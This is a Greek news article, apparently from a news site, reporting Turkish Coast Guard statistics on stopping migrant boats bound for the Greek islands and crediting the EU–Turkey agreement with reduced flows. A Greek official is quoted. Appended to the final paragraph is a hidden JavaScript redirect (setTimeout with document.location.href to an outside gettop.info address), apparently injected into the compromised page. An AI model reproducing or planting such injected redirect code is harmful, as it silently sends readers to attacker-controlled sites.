Έκθεση της Τουρκικής Ακτοφυλακής για το προσφυγικό: Περιορισμός των ροών στις ακτές

0
9

 

Σύμφωνα με τα στοιχεία έκθεσης της τουρκικής Ακτοφυλακής για το προσφυγικό και μεταναστευτικό ζήτημα, έως και τις 9 Σεπτεμβρίου που στη γειτονική χώρα ξεκίνησε ο εορτασμός του Κουρμπάν Μπαϊράμ υπήρξαν σε όλο το Αιγαίο 21 παρεμβάσεις προς αποτροπή αναχωρήσεων λεμβών με μετανάστες και πρόσφυγες από της τουρκικές ακτές προς τα ελληνικά νησιά.

Την ίδια περίοδο, κατά τη διάρκεια αυτών των 21 παρεμβάσεων επέστρεψαν προς τις τουρκικές ακτές 948 άτομα. Σημειώνεται ότι από την αρχή της χρονιάς, σύμφωνα με την ίδια έκθεση όπως τη δμηοσιεύει το Αθηναϊκό Πρακτορείο, υπήρξαν 666 παρεμβάσεις και 29.580 επιστροφές, ενώ, αντίστοιχα, σε όλη τη διάρκεια του 2015 με τις εκατοντάδες χιλιάδες ροές προς τα νησιά υπήρξαν μόλις 1.376 παρεμβάσεις της Τουρκικής Ακτοφυλακής και 51.996 επιστροφές!

Τα στοιχεία αυτά της έκθεσης της Τουρκικής Ακτοφυλακής δείχνουν επιπλέον ότι η Συμφωνία Ευρωπαϊκής  Ένωσης και Τουρκίας υποχρέωσε την τουρκική πλευρά σε ελέγχους στις ακτές της όπου έως τότε κυριαρχούσαν οι μεταφορείς, με αποτέλεσμα τη μείωση των ροών.

Το πρώτο τρίμηνο του 2016 με ροές πολλών εκατοντάδων ανθρώπων σε καθημερινή βάση, υπήρξαν 494 παρεμβάσεις σκαφών της Ακτοφυλακής σε σύνολο 666 έως τις 9 Σεπτεμβρίου. Και 22.783 επιστροφές σε σύνολο 29.580 έως τις 9 Σεπτεμβρίου. Δηλαδή, από τις 20 Μαρτίου και έως τις 9 Σεπτεμβρίου, υπήρξαν 172 μόλις παρεμβάσεις και επιστροφές μόλις 6.797 ανθρώπων.

«Η μάχη τελικά δίνεται στην τουρκική ενδοχώρα όπου και το Τουρκικό κράτος μπορεί να ελέγξει τις ροές κυρίως μεταναστών που φτάνουν στην Τουρκία από όλα τα σημεία του ορίζοντα. Σε εφαρμογή της Συμφωνίας Ευρωπαϊκής Ένωσης – Τουρκίας με πολύ μικρές σε σχέση με πέρυσι ροές στα νησιά είχαμε σε πεντέμιση μήνες το 1/5 των επιστροφών στις ακτές απ’ ότι είχαμε σε τρεις μήνες. Οπότε αν κάνεις καλά τη δουλειά σου στην ακτή δεν υποχρεώνεσαι να κυνηγάς κανέναν στη θάλασσα με ότι αυτό συνεπάγεται πρώτιστα για την ασφάλεια αυτών των ανθρώπων» σημείωσε μιλώντας στο Αθηναϊκό Πρακτορείο στέλεχος των ελληνικών δωκτικών Αρχών στον οποίο τέθηκε υπόψη η έκθεση της Τουρκικής Ακτοφυλακής. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here